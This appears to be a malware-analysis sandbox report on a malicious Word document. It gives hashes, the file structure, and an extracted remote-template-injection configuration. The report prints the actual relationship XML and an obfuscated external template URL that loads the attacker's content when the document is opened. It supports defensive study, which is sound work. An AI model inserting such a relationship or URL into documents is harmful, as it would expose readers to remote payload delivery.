Malicious
Malicious

e47d1c09d1dd20778dff10daed903426bc0790[...]doc.bin

MS Word Document
|
MD5: bd93ec547a27307eb937014f228cec39
|
Size: 57.16 KB
|
application/msword
Office Document
T1221
Remote Template Injection
Print
General
Structural Analysis
Config.1
Yara Rules3
Sync
Insights
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
bd93ec547a27307eb937014f228cec39
Sha1
156d6b4aa005f0c934d774337db349fe4b551352
Sha256
e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1
Sha384
96a40cd7a64e7e4ce84f4317ac9a96c54539453b6553332f480915f30bb25541370a1289048706a9d1f603d8d09e245e
Sha512
e9146cd20e44d24b708ecdda3271260d56f92fd879db4688e21adb6ec20fd8d904d957475ef855254c8e33fa87a3c481f5a90ef8360b5c9320f92acb4a0fc7f5
SSDeep
1536:QK1tteJcM4ZeFbBxK7TLtMSrbzMUSCwO6H+m35iUkg98B:QK1tteWMoepWd5ByH+orkg98B
TLSH
6743F16B75A04486E71E853E5506A348ED8DB3C6876B12716328BFFD4AFF4DE8E02604
File Structure
e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1.doc.bin
Office Document
T1221
Remote Template Injection
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
T1221
Remote Template Injection
Malicious
document.xml
Xml
footnotes.xml
Xml
footer3.xml
Xml
footer2.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
embeddings
Malicious
Microsoft_Office_Excel_97-2003_Worksheet1.xls
Office Document
Malicious
.
Root Entry
Ole
EPRINT
CompObj
ObjInfo
Workbook
SummaryInformation
DocumentSummaryInformation
[Formulas]
Malicious
media
image1.emf
theme
theme1.xml
Xml
settings.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
styles.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious Document RelationShip

https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J
e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1.doc.bin (57.16 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙